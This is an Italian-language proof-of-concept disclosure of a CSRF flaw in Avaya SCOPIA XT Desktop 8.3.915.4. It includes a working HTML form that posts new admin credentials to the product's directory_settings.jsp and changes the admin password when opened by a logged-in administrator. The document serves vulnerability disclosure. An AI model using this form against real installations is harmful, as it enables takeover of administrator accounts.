
Prova di concetto che dimostra Cross-Site Request Forgery (CSRF) su Avaya SCOPIA XT Desktop, che consente di modificare la password dell'amministratore senza token anti-CSRF.
Questo PoC descriverà come sfruttare la Cross-Site Request Forgery (CSRF) su SCOPIA XT Desktop versione 8.3.915.4
sito web: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
La cross-site request forgery, nota anche come attacco one-click o session riding e abbreviata come CSRF o XSRF, è un tipo di exploit dannoso di un sito web in cui comandi non autorizzati vengono trasmessi da un utente di cui l'applicazione web si fida.
Nella pagina "Directory and Authentication", l'amministratore è in grado di cambiare la propria password.
Catturando la richiesta con Burp Suite ho potuto notare che un token anti-csrf non era implementato e l'unico meccanismo di sicurezza è il cookie di sessione.
6
Ho creato questo file html che è servito come PoC per sfruttare la vulnerabilità presentata.
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
Eseguendolo nel browser che ha un cookie valido per l'ambiente di amministrazione di SCOPIA XT Desktop, è stato possibile cambiare la password dell'utente admin in "attacker":
4
5